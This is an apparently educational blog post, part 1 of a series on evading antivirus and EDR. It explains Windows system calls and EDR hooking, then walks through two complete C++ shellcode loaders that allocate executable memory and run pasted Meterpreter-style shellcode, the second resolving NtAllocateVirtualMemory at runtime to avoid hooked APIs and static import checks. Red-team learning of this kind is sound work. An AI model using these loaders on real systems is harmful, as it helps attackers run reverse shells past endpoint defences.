avatarbob van der staak

Summary

The provided web content is an in-depth exploration of techniques for bypassing antivirus and Endpoint Detection and Response (EDR) systems through the manipulation of system calls, particularly focusing on Windows system calls and the transition between user mode and kernel mode.

Abstract

The article delves into the intricacies of system calls within the Windows operating system, emphasizing their role in the execution of security-evading techniques. The author, who is new to the field, aims to demystify the process by starting with fundamental concepts such as the difference between user mode and kernel mode, and the significance of system calls as the interface between user-mode applications and kernel operations. The discussion progresses through the types of system calls, the structure of Windows API layers, and the potential for EDR hooking to detect malicious behavior. Practical code examples illustrate the use of high-level Windows APIs and native APIs to allocate memory and execute shellcode, while also touching on the importance of proper memory management and the potential for detection by EDRs. The article concludes with a commitment to further research into more advanced techniques, including direct syscalls, and the intention to share findings and documentation with the community.

Opinions

  • The author believes that understanding the basics of system calls and Windows API layers is crucial for developing effective EDR evasion techniques.
  • There is an opinion that while the techniques discussed may be detected by modern EDRs, the knowledge of these methods is valuable for foundational understanding and future research.
  • The author suggests that static analysis tools may not readily detect the use of native Windows APIs due to dynamic loading during runtime, which could potentially bypass certain EDR checks.
  • The article implies that the evolution of security measures, such as Microsoft's Kernel Patch Protection (KPP), has necessitated more sophisticated bypass techniques.
  • The author expresses a personal commitment to continued learning and sharing of knowledge within the information security community.

Exploring Antivirus and EDR evasion techniques step-by-step. Part 1

My learnings on how the different steps in EDR and Antivirus techniques are used in the field.

Introduction

In this series, I will explore the techniques used in the field to bypass Antivirus and EDR systems. I am new in this field and the best way to start is to read, implement, and understand the subject, instead of immediately going to the advanced techniques. I like to start at the beginning and take you with me in exploring the techniques currently used in the field. Therefore we will start with Windows (native) api’s. Specifically this blog will go into depth on 3 items:

  • Step 1: Introduction on system calls, where are they used for, What is User — and kernel mode?
  • Step 2: High Level APIs -> How shellcode can be executed by making use of Windows APIs
  • Step 3: Medium Level APIs -> How shellcode can be executed by making use of Windows native APIs.

Note the following items will be detected by almost all EDR’s. This series gives hopefully a better insight into the basics and the foundation of Windows. In the next chapters, we will dig deeper and deeper into the subject. In the end, I see it as a possibility to share my experience and “research” with the community and create some useful documentation for myself that I can reference in the future.

What is a System call?

Before we can explain how antivirus and EDR’s could be evaded by making use of system calls it is good to understand what a system call is.

In one sentence:

A system call is a programmatic instruction that allows a temporary transition from user mode to kernel mode.

Before we delve deeper I think it is first important to take a step back even further and understand what user mode and kernel mode means.

But what are the user mode and kernel modes then?

A processor in a computer running Windows has two different modes: user mode and kernel mode.

The processor switches between the two modes depending on what type of code is running on the processor. Applications run in user mode, and core operating system components run in kernel mode. While many drivers run in kernel mode, some drivers may run in user mode.

User mode

When you start an application, Windows creates a process for the application. The process provides the application with a private virtual address space and a private handle table. Because an application’s virtual address space is private, one application can’t alter data that belongs to another application. Each application runs in isolation, and if an application crashes, the crash is limited to that one application. Other applications and the operating system aren’t affected by the crash.

In addition to being private, the virtual address space of a user-mode application is limited. A process running in user mode can’t access virtual addresses that are reserved for the operating system. Limiting the virtual address space of a user-mode application prevents the application from altering, and possibly damaging, critical operating system data.

Kernel mode

All code that runs in kernel mode shares a single virtual address space. Therefore, a kernel-mode driver isn’t isolated from other drivers and the operating system itself. If a kernel-mode driver accidentally writes to the wrong virtual address, data that belongs to the operating system or another driver could be compromised. If a kernel-mode driver crashes, the entire operating system crashes.

This diagram illustrates communication between user-mode and kernel-mode components.

Image from Microsoft showing the line between User Mode and kernel mode

The transition from user mode to kernel mode occurs when the application requests the help of the operating system or an interrupt or a system call occurs.

Process Monitor

We can get a view from this step when looking into procesmonitor. When we create a file in Notepad.exe and view the events. We see that KernelBASE.dll Performs a CreateFileW Windows API function. (Where the W stands for “wide character” so it operates on Unicaode strings (UTF-16). Followed by a Native windows function ZwCreateFile in the ntdll.dll (can be NT or ZW) and then it goes into kernel mode with the systemcall and really creates the file by making use of the ntoskrnl.exe.

And so we are back at the system call!

Types of System Calls

Where are System calls required? Eventually, there are five types of system calls. These are explained in detail as follows -

Process Control

This system calls deals with processes such as process creation, process termination etc. (CreateProcess() ExitProcess() WaitForSingleObject())

File Management

These system calls are responsible for file manipulation such as creating a file, reading a file, writing into a file etc. (CreateFile() ReadFile() WriteFile() CloseHandle())

Device Management

These system calls are responsible for device manipulation such as reading from device buffers, writing into device buffers etc. (SetConsoleMode(), ReadConsole(), WriteConsole())

Information Maintenance

These system calls handle information and its transfer between the operating system and the user program. (GetCurrentProcessID(),SetTimer(),Sleep())

Communication

These system calls are useful for interprocess communication. They also deal with creating and deleting a communication connection. (CreatePipe(),CreateFileMapping(),MapViewOfFile())

System call are not wrapper function

There is a very important distinction to make. In C/C++, when we want to copy some data into memory, we use the following piece of code:

 memcpy(exec, code, sizeof code);

This is not a system call. This is just the memcpy function which is part of the C/C++ library that will make the call too the Windows api VirtualAlloc for us. This memcpy code is not defined within the kernel of the OS like NtAllocateVirtualMemory for example.

So in short:

A system call is a programmatic instruction that allows a temporary transition from user mode to kernel mode. They provide the interface between a process in user mode and the task to be executed in the kernel. System calls are required in situations such as accessing hardware devices, network connections, and reading and writing files. There are five types of system calls, including process control, file management, device management, information maintenance, and communication. System calls are the only entry points for the kernel system.

Okay, now we know what a System call is and why it is used, but what does this have to do with EDR or antivirus evasion?

EDR Hooking

In this blog, I will in this blog not go into great detail about EDR hooking and how you can view if your native API’s are hooked by a specific API. (Which is possible). But in short: API hooking is a technique used by many EDR and AVs to monitor a process or code execution in real-time for malicious behaviors. It implements a jump function within ntdll.dll on the location where the EDR is hooked. The jump function in assembly forces the execution of the flow to point to EDR’s code where it is able to detect suspicious behavior when the EDR is enabled.

As a hacker / Red teamer, it is important to find methods to bypass this. We don’t want our code to be analyzed by the EDR. Therefore different methodologies are implemented. In this series, I want to investigate a few techniques and along the way we will probably discover many more possibilities.

Making use of native Windows API’s ==> Direct Syscalls ==> Indirect Syscalls ==> Patching.

In this blog, we start with high-level Windows API’s going to native windows API’s. This EDR bypass would only work if the hook of the EDR is checking the high-level Windows API and not the Native API. Which is probably not the case. But good to have a brought understanding of the subject.

What does this look like in an image?

An image speaks more than 1000 words therefore summarize within an image:

Program where NtAllocateVirtualMemory function is hooked by an EDR.

This image shows what this would look like. In the case of our High Level Windows API it will call VirtualAlloc. Which will be located in Kernel32.dll. This will then reference Kernelbase.dll which is the successor of kernel32.dll. In essence, Kernel32.dll acts as a compatibility layer for older applications that rely on it. But many of its functions are redirected to their counterparts in kernelbase.dll. That is why both use the VirtualAlloc function. The VirtualAlloc function will call the ntdll.dll where the function of NTAllocateVirtualMemory is called. This is the Native Windows API. And based on this image a location where an EDR probably will hook. To analyze the call. If accepted the System call will be executed.

This will trigger a whole list of actions. An interesting read will be an article from alice[.]clement-pommeret[.]red if you want more details(see resources below). But in short, the current memory location will be stored in the LSTAR register so it knows what to do after the syscall is completed. the KiSystemCall64 is responsible for looking up the SYSCALL number which is passed from user-mode. This SYSCALL number will then be looked up in the KiServiceTable to find the corresponding kernel function. This is the System Service Dispatch Table or SSDT which is just a simple array of addresses each specifying the specified kernel routines. When that specific address is retrieved it will be executed. Which will result in the execution of the function code.

Well, even an image requires some explanation! but hope it gives a bit more insight!

Security Note:

In the past the SSDT could be patched (hooked) to hijack the kernel workflow. This was a way for an EDR or AV to perform analysis (like today with hooks in DLLs).

However, it’s not possible anymore. To prevent this kind of change, Microsoft invented the Kernel Patch Protection (KPP) also known as Patch Guard (PG). With KPP, any attempt to patch the SSDT or LSTAR will lead to a a BSOD (blue screen of death).

Step 2 ==> High level Windows API

Now that we have a better understanding of Syscalls and why we would want to investigate them. We can go a step further and start implementing. However again, to get a better understanding of the implementation let's start with the classic implementation by making use of the Windows APIs. Which are obtained through the kernel32.dll and kernelbase.dll

The code can be written in multiple languages. I will use a new C++ Project in Visual Studio. The code in question is quite small and is shown in the image below.

I already gave some explanation in the code, but let us review every line of code to get a better understanding of what we are doing.

The code below is the main part of the “evil code” This is the location where the code for the reverse shell or the code to create a local administrator account will be located. This can be performed with tools like meterpreter, sliver, cobalt strike. Generate the shell you like and place it in the code array. This will be used later in the code.

Note: This code doesn’t perform any encryption or further obfuscation of that given shell code. In the future, we will look at other steps which can be made to create better code. Like basic XOR encryption or the use of AES encryption. To minimize the risk of detection.

// The code array is the location where you store the Meterpreter shellcode  
unsigned char code[] = "\xa6\x12\xd9";

VirtualAlloc is a function in the Windows API that is used to allocate and manage virtual memory.

// Here the memory is allocated with size of the shell code, where it is 
 // indicated that the memory allocation 
 //is commited, which will be reserved in the system's page file or physical 
 // ram. And that the memory is allowed to be executed, readed an written too
 void* exec = VirtualAlloc(0, 
                           sizeof code,
                           MEM_RESERVE | MEM_COMMIT,
                           PAGE_EXECUTE_READWRITE);

Let's break down the function.

The first parameter is the lpAdress. it specifies the starting address of the allocation. If we keep the lpAdress zero the system will determine a suitable address for the location. This is the way to go. Otherwise, we should specify the memory location, which is hard to accomplish, especially on a target system.

The second parameter: sizeof code: specifies the size (in bytes) of the memory block to be allocated. The expression sizeof code is used to determine the size of the predefined shell code in bytes.

The Third parameter: MEM_RESERVE | MEM_COMMIT: This indicates that the memory allocation should be reserved and then committed. Committed memory is actually reserved in the system's page file or physical RAM. I have also seen code that only uses the MEM_COMMIT code. Interestingly following the documentation of Microsoft this is also “accepted” and it will reserve the memory for you. But to be more precise I will use the MEM_RESERVE | COMMIT method.

Attempting to commit a specific address range by specifying MEM_COMMIT without MEM_RESERVE and a non-NULL lpAddress fails unless the entire range has already been reserved. The resulting error code is ERROR_INVALID_ADDRESS.

The Fourth and last parameter: PAGE_EXECUTE_READWRITE: specifies the protection attributes for the allocated memory. When we are allocating dynamic memory addresses. The flProtect parameter must be PAGE_READWRITE or PAGE_EXECUTE_READWRITE. In this case, the choice has been made to use: PAGE_EXECUTE_READWRITE Because of this, the memory is allowed to be executed (since it includes the PAGE_EXECUTE flag) and also allows both reading and writing to the memory.

The following piece of code copies the provided shellcode (the second parameter). Into the just reserved memory variable (the first parameter). The size is determined by the third parameter by specifying the size of the given shell code variable.

Note: A more common approach is the use of the function memcpy. However, this is a specific C / C++ function and is not a Windows API or function. Therefore we use the Windows API function RtlCopyMemory. The working however stays the same.

// Here the specific shell code is coppied in side of the previous 
// allocated memory
 RtlCopyMemory(exec, code, sizeof code);

The last line of code is responsible for the execution of the code in memory.

// The exec variable is treated as a function pointer. to immediatly call 
 // the function pointer. Because exec is pointing to a memory location which 
 // contains our shell code. It will essentially execute the code storated 
 // at that address pointed to by exec.
 ((void(*)())exec)();

((void(*)()) exec)(): This line cast exec to a function pointer. Where it now points to a memory location that contains executable code. By casting it to a function pointer and calling it, you are essentially executing the code stored at the address pointed to by the exec. Therefore executing the shellcode that we committed into the memory location!

TLDR

In summary, this code allocates a block of virtual memory with a size equal to the provided shellcode. Where it is copied into memory and afterward it is immediately executed.

#include <stdio.h>
#include <windows.h>
// The code array is the location where you store the Meterpreter shellcode  
unsigned char code[] = "\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9\xa6\x12\xd9";


int main() {


 // Here the memory is allocated with size of the shell code, where it is 
 // indicated that the memory allocation 
 //is commited, which will be reserved in the system's page file or physical 
 // ram. And that the memory is allowed to be executed, readed an written too
 void* exec = VirtualAlloc(0, sizeof code, MEM_COMMIT, PAGE_EXECUTE_READWRITE);


 // Here the specific shell code is coppied in side of the previous 
 // allocated memory 
 RtlCopyMemory(exec, code, sizeof code);


 // The exec variable is treated as a function pointer. to immediatly call 
 // the function pointer. Because exec is pointing to a memory location which 
 // contains our shell code. It will essentially execute the code storated 
 // at that address pointed to by exec.
 ((void(*)())exec)();
 return 0;

}

Step 3 ==> Native Windows API

The next step is to make use of the Native API of Windows. This could potentially bypass an EDR or antivirus if it only hooks the kernel32.dll. This technique would bypass that hook. However, in this day and age, most AV and EDR’s would detect this technique. Still, it is good to know the first steps and the old techniques which were used.

Let us look at the code below which I will explain shortly:

#include <stdio.h>
#include <windows.h>
#include <winternl.h>

// Here we define the NtAllocateVirtualMemory function pointer, 
// which matches the NtAllocatedVirtualMemory function. This is required to store that function 
// in the correct variable in the future 
typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

// The same as above only we specify the NtFreeVirtualMemory function pointer
typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    PSIZE_T RegionSize,
    ULONG FreeType
    );

int main() {

    // The code array is the location where you store the Meterpreter shellcode
    unsigned char code[] = "\xa6\x12\xd9...";


    // The Windows API function Get ProcAdress is used to optain the adress of the ntdll.dll
    //The ntdll.dll contains many low-level windows functions. One of them being 
    // the NtAllocateVirtualMemory function which is the function we want to use to allocate memory 
    // in te next step. because of the cast of this function to the NtAllocateVirtualMemory variable.
    // We can use NtAllocateVirtualMemory as a function.
    PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
        (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");


    // The Allocate of the Virtual Memory. Where the variable status of type NTStatus will be set.
    // based upon if the allocated memory is succeeded or not. (Status code STATUS_SUCCESS indicates
    // that it was succesfull. the NtAllocateVirtualMemory is the function which we retrieved from last line
    // which is a windows api function to allocate virtual memory within a process.
    // The main difference between the other part is the GetCurrentProcess, which is used to obtain a
    // handle from the current running process. In that process the memory will be allocated.
    // exec will contain the base memory address. where the other parts are all the same from 
    // the previous example. 
    void* exec = NULL;
    SIZE_T size = sizeof(code);
    NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &exec, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);


    // Practically the same as memcopy Copy however RrlCopyMemory is the windows api equivilend and not a specific C/C++ function.
    // It also coppies the provided shellcode into previusly allocated memory, but it is often used in Windows kernel mode or Windows-specific applications.  
    RtlCopyMemory(exec, code, sizeof code);


    // The same code as before and is responsible to execute shellcode in memory  
    ((void(*)())exec)();


    // The same trick is performed to getthe NtAllocateVirutal memory function.
    // but this time NtFreeVirtualMemory is retrieved. This is required to make sure that 
    // the memory is given back to the system. Other wise a memory Leak will be an issue. 
    // your application will consume memory indefinitely, leading to resource exhaustion 
    // and potentially causing your application to run out of available address space.
    // So for proper memory management (Which is required at this level) we need to free the given memory region.
    // therefor we provide again the exec object (which contains the shell code) and specify mem_release
    // To make sure the memory is released again.
    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
    SIZE_T regionSize = 0;
    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);

    return 0;
}

Let's break the individual pieces of code down.

Note: First it is important to clarify that not all functions are Native Windows API’s. To make all code Native Api’s the same trick should be performed. But we will dive deeper in that when we are going for Direct syscalls which will be reserve: The Native Api’s would be:

— NtAllocateVirtualMemory

— NtWriteVirtualMemory

— NtFreeVirtualMemory

— NtCreateThreadEx

— NtWaitForSingleObject

— NtClose

// Here we define the NtAllocateVirtualMemory function pointer, 
// which matches the NtAllocatedVirtualMemory function. This is required to store that function 
// in the correct variable in the future 
typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

// The same as above only we specify the NtFreeVirtualMemory function pointer
typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    PSIZE_T RegionSize,
    ULONG FreeType
    );

The code above creates two types PNTALLOCATEVIRTUALMEMORY and PNTFREEVIRTUALMEMORY, which are both pointers to a function. The function that it points to must have a specific signature, which is defined within the parentheses. Both are native Windows API functions. which we will use in the lines below.

// The code array is the location where you store the Meterpreter shellcode
    unsigned char code[] = "\xa6\x12\xd9...";

Same as before the code array is the location where the specific shellcode is stored. This can be any code that you would like to execute.

// The Windows API function Get ProcAdress is used to optain the adress of the ntdll.dll
    //The ntdll.dll contains many low-level windows functions. One of them being 
    // the NtAllocateVirtualMemory function which is the function we want to use to allocate memory 
    // in te next step. because of the cast of this function to the NtAllocateVirtualMemory variable.
    // We can use NtAllocateVirtualMemory as a function.
    PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
        (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");

The code above makes use of the GetProcAddress Windows API function to obtain the address of the ntdll.dll. This dll contains many low-level Windows functions. One of them is the NtAllocateVirtualMemory function which is the function we want to use to allocate memory in the next step. because of the cast of this function to the NtAllocateVirtualMemory variable. We can use NtAllocateVirtualMemory as a function. Now we have used the prefined template we just created before! Without that definition, the program wouldn’t know in what format it should have been stored.

// The Allocate of the Virtual Memory. Where the variable status of type NTStatus will be set.
    // based upon if the allocated memory is succeeded or not. (Status code STATUS_SUCCESS indicates
    // that it was succesfull. the NtAllocateVirtualMemory is the function which we retrieved from last line
    // which is a windows api function to allocate virtual memory within a process.
    // The main difference between the other part is the GetCurrentProcess, which is used to obtain a
    // handle from the current running process. In that process the memory will be allocated.
    // exec will contain the base memory address. where the other parts are all the same from 
    // the previous example. 
    void* exec = NULL;
    SIZE_T size = sizeof(code);
    NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &exec, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

The code above is responsible for the memory allocation the same as with virtualAlloc. The important difference here is that virtualAlloc will store data in user mode context whereas NtAllocateVirtualMemory will do this in kernel mode! So as discussed at the beginning we are now one layer deeper in the OS. This functionality is more commonly used for drivers!

Let's check the different aspects.

The function data is stored as an NTSTATUS variable. This can be used to validate if the allocation of the memory was successful or not. If successful the status_code will be STATUS_SUCCESS. However, I do not verify that in this code example.

The first parameter for NtAllocateVirtual Memory uses the GetCurrentProcess function. This is based on the Windows API that returns a handle to the current process. It represents the running process in which the code is executing.

These are the parameters passed to NtAllocateVirtualMemory:

  • &exec is a pointer to a variable where the starting address of the allocated memory region will be stored. This can by default be NULL.
  • 0 is used to specify the base address where the memory should be allocated. In this case, it’s set to 0, indicating that the system should choose a suitable address.
  • &size is a pointer to a variable that specifies the size of the memory region to be allocated. This should be the size of the shell code we want to embed in the memory.

MEM_RESERVE | MEM_COMMIT: This indicates that the memory allocation should be reserved and then committed. Committed memory is actually reserved in the system's page file or physical RAM. I have also seen code that only uses the MEM_COMMIT code. Interestingly following the documentation of Microsoft this is also “accepted” and it will reserve the memory for you. But to be more precise I will use the MEM_RESERVE | COMMIT method.

PAGE_EXECUTE_READWRITE: This is a memory protection constant that specifies the protection level for the allocated memory. PAGE_EXECUTE_READWRITE indicates that the memory can be both executed (used for code) and read/written (used for data).

As we can see it is almost the same as the VirtualAlloc function!

 // Practically the same as memcopy Copy however RrlCopyMemory is the windows api equivilend and not a specific C/C++ function.
    // It also coppies the provided shellcode into previusly allocated memory, but it is often used in Windows kernel mode or Windows-specific applications.  
    RtlCopyMemory(exec, code, sizeof code);

This code stayed the same and is responsible for the copping of the shellcode into the allocated memory.

   // The same code as before and is responsible to execute shellcode in memory  
    ((void(*)())exec)();

The above code is the same as above, for an explanation see the other segment :)

    // The same trick is performed to getthe NtAllocateVirutal memory function.
    // but this time NtFreeVirtualMemory is retrieved. This is required to make sure that 
    // the memory is given back to the system. Other wise a memory Leak will be an issue. 
    // your application will consume memory indefinitely, leading to resource exhaustion 
    // and potentially causing your application to run out of available address space.
    // So for proper memory management (Which is required at this level) we need to free the given memory region.
    // therefor we provide again the exec object (which contains the shell code) and specify mem_release
    // To make sure the memory is released again.
    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
    SIZE_T regionSize = 0;
    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);

The next part is new. At this level, it is important to perform some cleanup after ourselves. We are required to perform some memory management. Otherwise, memory leaks could arise which could lead to resource exhaustion. Let's check the code:

The first part of the code is the same as NTAllocateVirtualMemory. It retrieves the function information from the ntdll.dll and stores that in the NtFreeVirtualMemory object. Except this time it is the NtFreeVirtualMemory function.

The next bit makes use of the NTFreeVirtualMemory function to get from the same process (the current one) and specify which memory we want to release (the reference to the memory pointer exec). Eventually, we release the memory back to the system again by making use of MEM_RELEASE.

In the end, it is practically the same, but a few more steps are required to perform the same action.

Verification

Oke now that we have gone through the code it is also important to perform some verification and visualize the differences that we made because of the different implementations. This is important to better understand the differences.

One of the verifications I used is the dumpbin utility of Microsoft. It comes installed with the Build tools for C++ and can be accessed easily through the Developer command prompt from Visual Studio. It is a Microsoft Utility used for examining the contents of binaries like EXE or DLL’s. It is possible to view the imported functions which are referenced by the specified executable.

This can be performed with the following command:

dumpbin /imports

In the following image, I show the imports of a standard helloworld program in C++ . (I only show the Kernel32.dll imports there are more imports).

Imports Kernel32.dll helloworld program

As you can see per default there are already quite a few functions that are imported. if we compare that to our High Level api imports, there are some editions.

High level API dumpbin results

We see that VirtualAlloc is imported into the application. This can be a red flag for AVs or EDRs to perform some further analysis on this executable. If we look a bit further we also see the importation of VCRUNTIME140.dll. Which is responsible apparently for the memcpy functions which we used in our software!

If we look at the Native Windows API, we don’t see the importation of VirtualAlloc anymore in the kernel32.dll. So if that was the check for an EDR or antivirus this would bypass that! However, there are some other imports. In the code, we used GetModuleHandleA and GetProcAddress. These are loaded from the Kernel32.dll so only looking at this there is a high indication that some other DLL is loaded externally into the application.

Interestingly if we look through the imports we don’t see any reference to ntdll.dll and the use of NTAllocateVirtualMemory and NTFreeVirtualMemory. This is the case because dumbin /imports only lists statically imported functions from libraries that are known at compile time. Because we Dynamically loaded these 2 functions during runtime by making use of GetProcAdress it isn’t visible in this view! So for verification purposes, this methodology of Dynamically linking the two functions makes static analysis a bit harder! (of course this can be viewed with other tools like Ghidra)

With another Windows tool, WinDebug, it is possible to debug executables and set breakpoints. It can be downloaded from the Microsoft store (see the link in the resources). After loading the NativeWinApi executable we immediately see that ntdll.dll is imported! So there is progress.

Afterward, I created a breakpoint for the NtAllocateVirtualMemory. After running it we see a hit! The NtAllocateVirutalMemory is loaded from the ntdll as seen from the line ntdll!NtAllocateVirutalMemory and the below assembly code.

Nice there is a verification that NTAllocateVirtualMemory is still being accessed from ntdll!

Next, we use the tool called ApiMonitor. This is a tool that helps visualize the individual Windows API call’s from a monitored application. The image below shows the monitored highLevelApi. Here we see that the Highlevelapi.exe call’s the VirtualAlloc API directly, (which we of course implemented in the code) and that KernelBase.dll is responsible for the NtAllocateVirtualMemory request.

I Don’t know why Apimonitor doesn’t show Kernel32.dll and that it only shows KernelBase.dll. Therefore there is a difference from the exported functions that dumpbin shows. I expect that it doesn’t visualize the forward from kernel32 to kernelbase, or that it is an error in the visualization.

HighLevelApi calling VirtualAlloc Where NTAllocateVirtualMemory is performed in KERNELBASE.dll

In the next image, we see the API usage of the code using the NativeWindows API. As expected we now see the API’s, GetModuleHandleA used with the loading of ntdll.dll (which would already be suspicious) and following the direct call to NTAllocateVirtualMemory. So we successfully called the function directly!

WindowsNativeAPI directly calling NTAllocateVirtualMemory!

Conclusion

I found it interesting to really look into the code which is the basics of Windows API. In the next blogs, I will dive even deeper and then we really will implement Direct Syscalls by investigating the different Syswhispers, Halo Gate, hell gate and Freshy calls! It will be interesting to investigate what the community already has found out!

Happy testing!

If you want to discuss anything related to infosec I’m on LinkedIn: https://www.linkedin.com/in/bobvanderstaak/

Resources used:

https://perspectiverisk.com/a-practical-guide-to-bypassing-userland-api-hooking/#:~:text=API%20hooking%20is%20a%20technique,be%20hooked%20by%20the%20EDR.

Microsoft explaining the workings of NTAllocateVirtual Memory.

https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory

Memory allocated by calling NtAllocateVirtualMemory must be freed by calling NtFreeVirtualMemory.

From <https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory>

Microsoft take on rtlcopymemory routine:

https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-rtlcopymemory

https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg

https://learn.microsoft.com/en-us/windows/win32/win7appqual/new-low-level-binaries

Cybersecurity
Software Engineering
Hacking
Security
Pentesting
Recommended from ReadMedium